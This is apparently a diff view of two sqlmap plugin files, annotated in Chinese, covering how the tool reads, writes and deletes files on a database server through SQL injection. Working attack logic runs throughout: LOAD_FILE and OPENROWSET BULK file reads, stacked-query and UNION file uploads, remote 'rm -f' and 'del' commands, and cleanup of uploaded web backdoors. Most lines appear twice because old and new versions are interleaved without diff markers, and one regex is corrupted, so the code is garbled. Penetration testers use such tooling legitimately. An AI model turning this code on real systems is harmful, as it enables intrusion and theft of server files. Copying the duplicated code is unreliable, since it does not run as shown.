from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.settings import UNICODE_ENCODING
from lib.request import inject
class Filesystem(object):
"""
这个类定义了插件的通用操作系统文件系统功能
This class defines generic OS file system functionalities for plugins.
"""
def __init__(self):
# 初始化文件表名
self.fileTblName = "%sfile" % conf.tablePrefix # 将配置中的表前缀与 "file" 组合,生成表名
# 初始化表字段名
self.tblField = "data" # 设置表字段名为 "data"
self.fileTblName = "%sfile" % conf.tablePrefix
self.tblField = "data"
def _checkFileLength(self, localFile, remoteFile, fileRead=False):
"""
检查本地文件和远程文件长度是否相同
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileRead (bool, optional): 是否为读取文件操作. Defaults to False.
Returns:
bool: 如果文件长度相同返回 True否则返回 False如果无法判断则返回 None
"""
if Backend.isDbms(DBMS.MYSQL):
# 如果是 MySQL 数据库
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile # 构建获取远程文件长度的 SQL 查询
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
# 如果是 PostgreSQL 数据库且不是读取文件操作
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid # 构建获取大对象长度的 SQL 查询
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
elif Backend.isDbms(DBMS.MSSQL):
# 如果是 MSSQL 数据库
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") # 创建支持表
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) # 使用 OPENROWSET 将文件内容插入表中
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) # 构建获取表数据长度的 SQL 查询
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)
try:
localFileSize = os.path.getsize(localFile) # 获取本地文件大小
localFileSize = os.path.getsize(localFile)
except OSError:
# 如果本地文件不存在
warnMsg = "file '%s' is missing" % localFile # 构造警告消息
logger.warning(warnMsg) # 打印警告信息
localFileSize = 0 # 将本地文件大小设置为 0
warnMsg = "file '%s' is missing" % localFile
logger.warning(warnMsg)
localFileSize = 0
if fileRead and Backend.isDbms(DBMS.PGSQL):
# 如果是读取文件操作且是 PostgreSQL 数据库
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) # 打印信息,表示 PostgreSQL 无法检查读取文件长度
sameFile = True # 将 sameFile 设置为 True
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
sameFile = True
else:
# 如果不是读取文件或者不是 PostgreSQL 数据库
logger.debug("checking the length of the remote file '%s'" % remoteFile) # 打印调试信息,表示正在检查远程文件长度
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取远程文件大小
sameFile = None # 将 sameFile 初始化为 None
logger.debug("checking the length of the remote file '%s'" % remoteFile)
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
sameFile = None
if isNumPosStrValue(remoteFileSize):
# 如果远程文件大小为有效的数字字符串
remoteFileSize = int(remoteFileSize) # 将远程文件大小转换为整数
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) # 将本地文件路径转换为 Unicode
sameFile = False # 将 sameFile 设置为 False
remoteFileSize = int(remoteFileSize)
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
sameFile = False
if localFileSize == remoteFileSize:
# 如果本地文件大小和远程文件大小相同
sameFile = True # 将 sameFile 设置为 True
infoMsg = "the local file '%s' and the remote file " % localFile # 构造信息消息
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) # 将远程文件路径和文件大小添加到信息消息中
sameFile = True
infoMsg = "the local file '%s' and the remote file " % localFile
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
elif remoteFileSize > localFileSize:
# 如果远程文件大小大于本地文件大小
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize)
else:
# 如果远程文件大小小于本地文件大小
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)
logger.info(infoMsg) # 打印信息消息
logger.info(infoMsg)
else:
# 如果远程文件大小不是有效的数字字符串
sameFile = False # 将 sameFile 设置为 False
warnMsg = "it looks like the file has not been written (usually " # 构造警告消息
warnMsg += "occurs if the DBMS process user has no write " # 警告消息补充
warnMsg += "privileges in the destination path)" # 警告消息补充
logger.warning(warnMsg) # 打印警告消息
sameFile = False
warnMsg = "it looks like the file has not been written (usually "
warnMsg += "occurs if the DBMS process user has no write "
warnMsg += "privileges in the destination path)"
logger.warning(warnMsg)
return sameFile # 返回文件长度检查结果
return sameFile
def fileToSqlQueries(self, fcEncodedList):
"""
将编码后的文件内容转换为 SQL 查询语句用于 MySQL PostgreSQL
Args:
fcEncodedList (list): 编码后的文件内容列表
Returns:
list: SQL 查询语句列表
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
counter = 0 # 初始化计数器
sqlQueries = [] # 初始化 SQL 查询语句列表
for fcEncodedLine in fcEncodedList: # 遍历编码后的文件内容列表
counter = 0
sqlQueries = []
for fcEncodedLine in fcEncodedList:
if counter == 0:
# 如果是第一个编码行
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
# 将带有编码数据的插入语句添加到 SQL 查询列表中
else:
# 如果不是第一个编码行
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
# 构建更新语句,将编码行添加到数据字段中
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
# 将更新语句添加到 SQL 查询列表中
counter += 1 # 计数器加 1
counter += 1
return sqlQueries # 返回 SQL 查询语句列表
return sqlQueries
def fileEncode(self, fileName, encoding, single, chunkSize=256):
"""
读取文件内容并进行编码
Args:
fileName (str): 文件路径
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
Returns:
list: 编码后的文件内容列表
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
checkFile(fileName) # 检查文件是否存在
checkFile(fileName)
with open(fileName, "rb") as f:
# 打开文件进行读取
content = f.read() # 读取文件内容
content = f.read()
return self.fileContentEncode(content, encoding, single, chunkSize) # 返回编码后的文件内容
return self.fileContentEncode(content, encoding, single, chunkSize)
def fileContentEncode(self, content, encoding, single, chunkSize=256):
"""
对文件内容进行编码
Args:
content (bytes): 文件内容
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
Returns:
list: 编码后的文件内容列表
"""
retVal = [] # 初始化返回列表
retVal = []
if encoding == "hex":
# 如果编码方式为 "hex"
content = encodeHex(content) # 将文件内容进行十六进制编码
content = encodeHex(content)
elif encoding == "base64":
# 如果编码方式为 "base64"
content = encodeBase64(content) # 将文件内容进行 Base64 编码
content = encodeBase64(content)
else:
# 如果编码方式不是 "hex" 或 "base64"
content = codecs.encode(content, encoding) # 使用指定的编码方式进行编码
content = codecs.encode(content, encoding)
content = getText(content).replace("\
", "") # 将编码后的内容转换为文本,并删除换行符
content = getText(content).replace("\n", "")
if not single:
# 如果不是单行编码
if len(content) > chunkSize:
# 如果内容长度大于分块大小
for i in xrange(0, len(content), chunkSize):
# 按照分块大小进行分块
_ = content[i:i + chunkSize] # 获取当前分块
_ = content[i:i + chunkSize]
if encoding == "hex":
# 如果编码方式为 "hex"
_ = "0x%s" % _ # 添加十六进制前缀
_ = "0x%s" % _
elif encoding == "base64":
# 如果编码方式为 "base64"
_ = "'%s'" % _ # 添加单引号
_ = "'%s'" % _
retVal.append(_) # 将当前分块添加到返回列表中
retVal.append(_)
if not retVal:
# 如果返回列表为空
if encoding == "hex":
# 如果编码方式为 "hex"
content = "0x%s" % content # 添加十六进制前缀
content = "0x%s" % content
elif encoding == "base64":
# 如果编码方式为 "base64"
content = "'%s'" % content # 添加单引号
content = "'%s'" % content
retVal = [content] # 将编码后的内容添加到返回列表中
retVal = [content]
return retVal # 返回编码后的文件内容列表
return retVal
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
"""
询问用户是否需要检查写入的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Returns:
bool: 如果文件写入成功返回 True如果用户选择不检查返回 True否则返回 False
"""
choice = None # 初始化用户选择
choice = None
if forceCheck is not True:
# 如果不强制检查
message = "do you want confirmation that the local file '%s' " % localFile # 构造询问消息
message += "has been successfully written on the back-end DBMS " # 消息补充
message += "file system ('%s')? [Y/n] " % remoteFile # 消息补充
choice = readInput(message, default='Y', boolean=True) # 读取用户输入
message = "do you want confirmation that the local file '%s' " % localFile
message += "has been successfully written on the back-end DBMS "
message += "file system ('%s')? [Y/n] " % remoteFile
choice = readInput(message, default='Y', boolean=True)
if forceCheck or choice:
# 如果强制检查或者用户选择检查
return self._checkFileLength(localFile, remoteFile) # 调用检查文件长度函数
return self._checkFileLength(localFile, remoteFile)
return True # 如果用户选择不检查,则返回 True
return True
def askCheckReadFile(self, localFile, remoteFile):
"""
询问用户是否需要检查读取的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
Returns:
bool: 如果文件读取成功返回 True如果用户选择不检查返回 None
"""
if not kb.bruteMode:
# 如果不是爆破模式
message = "do you want confirmation that the remote file '%s' " % remoteFile # 构造询问消息
message += "has been successfully downloaded from the back-end " # 消息补充
message += "DBMS file system? [Y/n] " # 消息补充
message = "do you want confirmation that the remote file '%s' " % remoteFile
message += "has been successfully downloaded from the back-end "
message += "DBMS file system? [Y/n] "
if readInput(message, default='Y', boolean=True):
# 读取用户输入
return self._checkFileLength(localFile, remoteFile, True) # 如果用户选择检查,调用检查文件长度函数
return self._checkFileLength(localFile, remoteFile, True)
return None # 如果用户选择不检查,则返回 None
return None
def nonStackedReadFile(self, remoteFile):
"""
使用非堆叠查询技术读取远程文件需要在子类中实现
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'nonStackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
errMsg = "'nonStackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedReadFile(self, remoteFile):
"""
使用堆叠查询技术读取远程文件需要在子类中实现
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
errMsg = "'stackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
"""
使用 UNION 查询技术写入文件需要在子类中实现
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'unionWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
errMsg = "'unionWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
"""
使用堆叠查询技术写入文件需要在子类中实现
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
errMsg = "'stackedWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def readFile(self, remoteFile):
"""
读取远程文件
Args:
remoteFile (str): 远程文件路径
Returns:
list: 本地文件路径列表
"""
localFilePaths = [] # 初始化本地文件路径列表
localFilePaths = []
self.checkDbmsOs() # 检查数据库类型和操作系统类型
self.checkDbmsOs()
for remoteFile in remoteFile.split(','):
# 遍历所有远程文件路径
fileContent = None # 初始化文件内容
kb.fileReadMode = True # 设置文件读取模式为 True
fileContent = None
kb.fileReadMode = True
if conf.direct or isStackingAvailable():
# 如果使用直接连接或支持堆叠查询
if isStackingAvailable():
# 如果支持堆叠查询
debugMsg = "going to try to read the file with stacked query SQL " # 构造调试消息
debugMsg += "injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
debugMsg = "going to try to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(remoteFile) # 使用堆叠查询技术读取文件
fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
# 如果是 MySQL 数据库
debugMsg = "going to try to read the file with non-stacked query " # 构造调试消息
debugMsg += "SQL injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
debugMsg = "going to try to read the file with non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(remoteFile) # 使用非堆叠查询技术读取文件
fileContent = self.nonStackedReadFile(remoteFile)
else:
# 如果无法使用以上技术读取文件
errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "be used to read files from the underlying file " # 错误消息补充
errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
fileContent = None # 将文件内容设置为 None
fileContent = None
kb.fileReadMode = False # 设置文件读取模式为 False
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
# 如果文件内容为空并且不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
self.cleanup(onlyFileTbl=True)
elif isListLike(fileContent):
# 如果文件内容是一个列表
newFileContent = "" # 初始化新的文件内容
newFileContent = ""
for chunk in fileContent:
# 遍历文件内容中的块
if isListLike(chunk):
# 如果块本身是一个列表
if len(chunk) > 0:
# 如果块列表不为空
chunk = chunk[0] # 获取块列表的第一个元素
chunk = chunk[0]
else:
# 如果块列表为空
chunk = "" # 将块设置为空字符串
chunk = ""
if chunk:
# 如果块不为空
newFileContent += chunk # 将块添加到新的文件内容中
newFileContent += chunk
fileContent = newFileContent # 将新的文件内容赋值给 fileContent
fileContent = newFileContent
if fileContent is not None:
# 如果文件内容不为空
fileContent = decodeDbmsHexValue(fileContent, True) # 解码文件内容
fileContent = decodeDbmsHexValue(fileContent, True)
if fileContent.strip():
# 如果文件内容不为空
localFilePath = dataToOutFile(remoteFile, fileContent) # 将文件内容写入本地文件
localFilePath = dataToOutFile(remoteFile, fileContent)
if not Backend.isDbms(DBMS.PGSQL):
# 如果不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
self.cleanup(onlyFileTbl=True)
sameFile = self.askCheckReadFile(localFilePath, remoteFile) # 询问用户是否需要检查读取的文件
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
if sameFile is True:
# 如果文件相同
localFilePath += " (same file)" # 添加 (same file) 后缀
localFilePath += " (same file)"
elif sameFile is False:
# 如果文件大小不同
localFilePath += " (size differs from remote file)" # 添加 (size differs from remote file) 后缀
localFilePath += " (size differs from remote file)"
localFilePaths.append(localFilePath) # 将本地文件路径添加到列表中
localFilePaths.append(localFilePath)
elif not kb.bruteMode:
# 如果文件内容为空并且不是爆破模式
errMsg = "no data retrieved" # 构造错误消息
logger.error(errMsg) # 打印错误消息
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths # 返回本地文件路径列表
return localFilePaths
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
"""
写入本地文件到远程服务器
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str, optional): 文件类型. Defaults to None.
forceCheck (bool, optional): 是否强制检查文件长度. Defaults to False.
Returns:
bool: 如果文件写入成功则返回 True否则返回 False
"""
written = False # 初始化写入状态
written = False
checkFile(localFile) # 检查本地文件是否存在
checkFile(localFile)
self.checkDbmsOs() # 检查数据库类型和操作系统类型
self.checkDbmsOs()
if localFile.endswith('_'):
# 如果本地文件名以 '_' 结尾
localFile = getUnicode(decloakToTemp(localFile)) # 将伪装的文件名转换为临时文件路径
localFile = getUnicode(decloakToTemp(localFile))
if conf.direct or isStackingAvailable():
# 如果使用直接连接或者支持堆叠查询技术
if isStackingAvailable():
# 如果支持堆叠查询技术
debugMsg = "going to upload the file '%s' with " % fileType # 构造调试消息
debugMsg += "stacked query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "stacked query technique"
logger.debug(debugMsg)
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用堆叠查询技术写入文件
self.cleanup(onlyFileTbl=True) # 清理临时表
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
self.cleanup(onlyFileTbl=True)
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
# 如果支持 UNION 查询技术并且是 MySQL 数据库
debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
debugMsg += "UNION query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "UNION query technique"
logger.debug(debugMsg)
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 UNION 查询技术写入文件
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
elif Backend.isDbms(DBMS.MYSQL):
# 如果是 MySQL 数据库
debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
debugMsg += "LINES TERMINATED BY technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "LINES TERMINATED BY technique"
logger.debug(debugMsg)
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 LINES TERMINATED BY 技术写入文件
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
else:
# 如果以上技术都无法使用
errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "be used to write files to the underlying file " # 错误消息补充
errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to write files to the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
return None # 返回 None
return None
return written # 返回写入状态
return written

261
src/sqlmap-master/plugins/generic/misc.py
Unescape View File

@ -5,211 +5,200 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import re # 导入 re 模块,用于正则表达式
from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.common import hashDBWrite # 导入 hashDBWrite 函数,用于写入哈希数据库
from lib.core.common import isStackingAvailable # 导入 isStackingAvailable 函数,用于检查是否支持堆叠查询
from lib.core.common import normalizePath # 导入 normalizePath 函数,用于规范化路径
from lib.core.common import ntToPosixSlashes # 导入 ntToPosixSlashes 函数,用于将 Windows 路径转换为 POSIX 路径
from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 Windows 路径
from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.common import singleTimeDebugMessage # 导入 singleTimeDebugMessage 函数,用于输出单次调试信息
from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于将数组值转换为单个值
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.data import queries # 导入 queries 字典,存储数据库查询语句
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import HASHDB_KEYS # 导入 HASHDB_KEYS 枚举,定义哈希数据库键值
from lib.core.enums import OS # 导入 OS 枚举,定义操作系统类型
from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
# 定义 Miscellaneous 类,用于实现杂项功能
import ntpath
import re
from lib.core.common import Backend
from lib.core.common import hashDBWrite
from lib.core.common import isStackingAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import posixToNtSlashes
from lib.core.common import readInput
from lib.core.common import singleTimeDebugMessage
from lib.core.common import unArrayizeValue
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.exception import SqlmapNoneDataException
from lib.request import inject
class Miscellaneous(object):
"""
This class defines miscellaneous functionalities for plugins.
"""
# 初始化 Miscellaneous 类
def __init__(self):
pass
# 定义 getRemoteTempPath 方法,用于获取远程临时路径
def getRemoteTempPath(self):
if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): # 如果没有设置临时路径且数据库是 MSSQL
debugMsg = "identifying Microsoft SQL Server error log directory " # 输出调试信息
if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL):
debugMsg = "identifying Microsoft SQL Server error log directory "
debugMsg += "that sqlmap will use to store temporary files with "
debugMsg += "commands' output"
logger.debug(debugMsg)
_ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) # 获取错误日志文件路径
_ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False))
if _: # 如果获取到路径
conf.tmpPath = ntpath.dirname(_) # 设置临时路径为错误日志文件所在的目录
if _:
conf.tmpPath = ntpath.dirname(_)
if not conf.tmpPath: # 如果没有设置临时路径
if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
if conf.direct: # 如果是直接连接
conf.tmpPath = "%TEMP%" # 设置临时路径为 %TEMP%
if not conf.tmpPath:
if Backend.isOs(OS.WINDOWS):
if conf.direct:
conf.tmpPath = "%TEMP%"
else:
self.checkDbmsOs(detailed=True) # 检测数据库操作系统
self.checkDbmsOs(detailed=True)
if Backend.getOsVersion() in ("2000", "NT"): # 如果是 Windows 2000 或 NT
conf.tmpPath = "C:/WINNT/Temp" # 设置临时路径
elif Backend.isOs("XP"): # 如果是 Windows XP
conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp" # 设置临时路径
else: # 如果是其他 Windows 版本
conf.tmpPath = "C:/Windows/Temp" # 设置临时路径
else: # 如果操作系统不是 Windows
conf.tmpPath = "/tmp" # 设置临时路径为 /tmp
if Backend.getOsVersion() in ("2000", "NT"):
conf.tmpPath = "C:/WINNT/Temp"
elif Backend.isOs("XP"):
conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp"
else:
conf.tmpPath = "C:/Windows/Temp"
else:
conf.tmpPath = "/tmp"
if re.search(r"\A[\w]:[\/\$$+", conf.tmpPath, re.I): # 如果临时路径是 Windows 格式
Backend.setOs(OS.WINDOWS) # 设置操作系统为 Windows
if re.search(r"\A[\w]:[\/\\]+", conf.tmpPath, re.I):
Backend.setOs(OS.WINDOWS)
conf.tmpPath = normalizePath(conf.tmpPath) # 规范化临时路径
conf.tmpPath = ntToPosixSlashes(conf.tmpPath) # 将临时路径转换为 POSIX 格式
conf.tmpPath = normalizePath(conf.tmpPath)
conf.tmpPath = ntToPosixSlashes(conf.tmpPath)
singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) # 输出调试信息
singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath)
hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) # 写入哈希数据库
hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath)
return conf.tmpPath # 返回临时路径
return conf.tmpPath
# 定义 getVersionFromBanner 方法,用于从 banner 中获取数据库版本
def getVersionFromBanner(self):
if "dbmsVersion" in kb.bannerFp: # 如果 banner 中已经有版本信息
return # 直接返回
if "dbmsVersion" in kb.bannerFp:
return
infoMsg = "detecting back-end DBMS version from its banner" # 输出信息
infoMsg = "detecting back-end DBMS version from its banner"
logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query # 获取 banner 查询语句
query = queries[Backend.getIdentifiedDbms()].banner.query
if conf.direct: # 如果是直接连接
query = "SELECT %s" % query # 添加 SELECT 关键字
if conf.direct:
query = "SELECT %s" % query
kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or "" # 获取 banner 信息
kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or ""
match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"]) # 使用正则表达式匹配版本号
if match: # 如果匹配成功
kb.bannerFp["dbmsVersion"] = match.group(0) # 设置版本号
match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"])
if match:
kb.bannerFp["dbmsVersion"] = match.group(0)
# 定义 delRemoteFile 方法,用于删除远程文件
def delRemoteFile(self, filename):
if not filename: # 如果文件名为空
return # 直接返回
if not filename:
return
self.checkDbmsOs() # 检测数据库操作系统
self.checkDbmsOs()
if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
filename = posixToNtSlashes(filename) # 将路径转换为 Windows 格式
cmd = "del /F /Q %s" % filename # 构建删除命令
else: # 如果操作系统不是 Windows
cmd = "rm -f %s" % filename # 构建删除命令
if Backend.isOs(OS.WINDOWS):
filename = posixToNtSlashes(filename)
cmd = "del /F /Q %s" % filename
else:
cmd = "rm -f %s" % filename
self.execCmd(cmd, silent=True) # 执行删除命令
self.execCmd(cmd, silent=True)
# 定义 createSupportTbl 方法,用于创建支持表
def createSupportTbl(self, tblName, tblField, tblType):
inject.goStacked("DROP TABLE %s" % tblName, silent=True) # 删除表(如果存在)
inject.goStacked("DROP TABLE %s" % tblName, silent=True)
if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: # 如果是 MSSQL 并且表名是命令表
inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) # 创建表,包含自增 id
else: # 如果不是 MSSQL 或表名不是命令表
inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) # 创建表
if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName:
inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType))
else:
inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType))
# 定义 cleanup 方法,用于清理文件系统和数据库
def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):
"""
Cleanup file system and database from sqlmap create files, tables
and functions
"""
if web and self.webBackdoorFilePath: # 如果是 web 模式且有 web 后门文件路径
logger.info("cleaning up the web files uploaded") # 输出信息
if web and self.webBackdoorFilePath:
logger.info("cleaning up the web files uploaded")
self.delRemoteFile(self.webStagerFilePath) # 删除 web stager 文件
self.delRemoteFile(self.webBackdoorFilePath) # 删除 web 后门文件
self.delRemoteFile(self.webStagerFilePath)
self.delRemoteFile(self.webBackdoorFilePath)
if (not isStackingAvailable() or kb.udfFail) and not conf.direct: # 如果不支持堆叠查询或 udf失败且不是直接连接
return # 直接返回
